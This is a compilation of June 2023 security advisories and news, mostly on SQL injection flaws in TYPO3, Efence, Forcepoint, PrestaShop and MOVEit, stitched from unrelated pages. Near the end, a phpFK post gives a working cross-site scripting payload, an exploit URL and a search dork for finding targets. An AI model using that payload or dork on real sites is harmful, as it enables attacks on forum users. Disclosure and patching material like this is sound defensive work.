The ipandlanguageredirect extension before 5.1.2 for TYPO3 allows SQL Injection.

Tue. 13th June, 2023

It has been discovered that the extension "ipandlanguageredirect" (ipandlanguageredirect) is susceptible to SQL Injection.

*   Release Date: June 13, 2023
*   Component Type: Third party extension. This extension is not a part of the TYPO3 default installation.
*   Component: "ipandlanguageredirect" (ipandlanguageredirect)
*   Composer Package Name: in2code/ipandlanguageredirect
*   Vulnerability Type: SQL Injection
*   Affected Versions: 5.1.1 and below
*   Severity: High
*   Suggested CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O/RC:C
*   References: not assigned yet, CWE-89

**Problem Description**

The extension fails to properly sanitize user input and is susceptible to SQL Injection.

**Solution**

An updated version 5.1.2 is available from the TYPO3 extension manager, packagist and at    
https://extensions.typo3.org/extension/download/ipandlanguageredirect/5.1.2/zip  
Users of the extension are advised to update the extension as soon as possible.

**Credits**

Thanks to Alexander Kellner for providing an updated version of the extension.

**General Advice**

Follow the recommendations that are given in the TYPO3 Security Guide. Please subscribe to the typo3-announce mailing list.

CVE-2023-35782: SQL Injection in extension "ipandlanguageredirect" (ipandlanguageredirect)

Thinking Software Efence login function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify or delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202306004

CVE ID

CVE-2023-32754

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

思考軟體科技 Efence 1.2.59 DB.ver 36

問題描述

Efence之登入功能未對使用者輸入的參數進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

Update Efence version to 1.2.59 DB.ver 41

漏洞通報者

潘予德、何雨蓁 (華電聯網)

公開日期

2023-06-16

CVE-2023-32754: 思考軟體科技 Efence - SQL injection

Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies.
The new flaw, which is yet to be assigned a CVE identifier, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment."
The

Cyber Attack / Ransomware

Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies.

The new flaw, which is yet to be assigned a CVE identifier, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment."

The company is urging all its customers to disable all HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a patch is being prepared to address the weakness.

The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities (CVE-2023-35036) that it said could be weaponized to access the application's database content.

The vulnerabilities join CVE-2023-34362, which was exploited as a zero-day by the Clop ransomware gang in data theft attacks. Kroll said it found evidence that the group, dubbed Lace Tempest by Microsoft, had been testing the exploit as far back as July 2021.

The development also coincides with the Cl0p actors listing the names of 27 companies that it claimed were hacked using the MOVEit Transfer flaw on its darknet leak portal. According to a report from CNN, this also includes multiple U.S. federal agencies such as the Department of Energy.

"The number of potentially breached organizations so far is significantly greater than the initial number named as part of Clop's last MFT exploitation: the Fortra GoAnywhere MFT campaign," ReliaQuest said.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

Censys, a web-based search platform for assessing attack surface for internet-connected devices, said nearly 31% of over 1,400 exposed hosts running MOVEit are in the financial services industry, 16% in healthcare, 9% in information technology, and 8% in government and military sectors. Nearly 80% of the servers are based in the U.S.

Per Kaspersky's analysis of 97 families spread via the malware-as-a-service (MaaS) business model between 2015 and 2022, ransomware leads with a 58% share, followed by information stealers (24%) and botnets, loaders, and backdoors (18%).

"Money is the root of all evil, including cybercrime," the Russian cybersecurity company said, adding the MaaS schemes allow less technically proficient attackers to enter the fray, thereby lowering the bar for carrying out such attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

CVE-2023-32027

CVE-2023-32026

CVE-2023-29356

CVE-2023-32025

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Forcepoint Cloud Security Gateway (CSG) Portal on Web Cloud Security Gateway, Email Security Cloud allows Blind SQL Injection.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-2080: Forcepoint Customer Hub

In the PrestaShop < 2.4.3 module "Length, weight or volume sell" (ailinear) there is a SQL injection vulnerability.

In the module “Length, weight or volume sell” (ailinear) for PrestaShop, an attacker can perform SQL injection up to 2.4.3. Release 2.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-31672
*   **Published at**: 2023-06-15
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: ailinear
*   **Impacted release**: < 2.4.3 (2.4.3 fixed the vulnerability)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 2.4.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted others and more variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch**

    --- a/ailinear/includes/ajax.php
    +++ b/ailinear/includes/ajax.php
    @@ -346,17 +346,23 @@ if (Tools::getIsset('action')) {
         $request_value = Tools::getIsset('value') ? Tools::getValue('value') : 0;
         $request_product = (int)Tools::getValue('product');
         $request_more = Tools::getValue('more');
    -    $request_others = Tools::getValue('others');
    +    $request_others = (int)Tools::getValue('others');
         $request_quantity = (int)Tools::getValue('qty');
     
         /* Test if base combination exists */
         if ($request_more != '') {
    -        $more = explode('_', $request_more);
    +        $more_attributes = explode('_', $request_more);
    +        $more_attributes = array_map('intval', $more_attributes);
    +        foreach ($more_attributes as $key => $attr) {
    +            if (!$attr) {
    +                unset($more_attributes[$key]);
    +            }
    +        }
             
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS(
                 'SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute_combination WHERE id_product_attribute IN (SELECT id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE '.
    -            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more).') GROUP BY id_product_attribute HAVING number = '.count($more).' ORDER BY id_product_attribute ASC'
    +            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more_attributes).') GROUP BY id_product_attribute HAVING number = '.count($more_attributes).' ORDER BY id_product_attribute ASC'
             );
             
             /* Get the attributes values and lang for the product */
    @@ -364,6 +370,8 @@ if (Tools::getIsset('action')) {
                 die('Unknown');
             }
         } else {
    +        $more_attributes = array();
    +        
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS('SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE id_product = '.$request_product.' ORDER BY id_product_attribute ASC');
         }
    @@ -373,13 +381,6 @@ if (Tools::getIsset('action')) {
             $return = 'Message->'.$module->l('Message for delayed preparation', 'ajax').'|';
         }
     
    -    /* Get attributes */
    -    if ($request_more != '') {
    -        $more_attributes = explode('_', $request_more);
    -    } else {
    -        $more_attributes = array();
    -    }
    -
         /* Get price changes */
         $more_attributes_price = 0;
         if (count($more_attributes)) {
    

**Other recommendations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-03-08

Vunlnerability found during a audit by 202 ecommerce

2023-03-08

Contact the author

2023-03-08

The author confirm the issue and supply a fixed release

2023-04-23

Request a CVE ID

2023-06-15

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-31672: [CVE-2023-31672] Improper neutralization of an SQL parameter in ailinear module for PrestaShop

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

Tag

#sql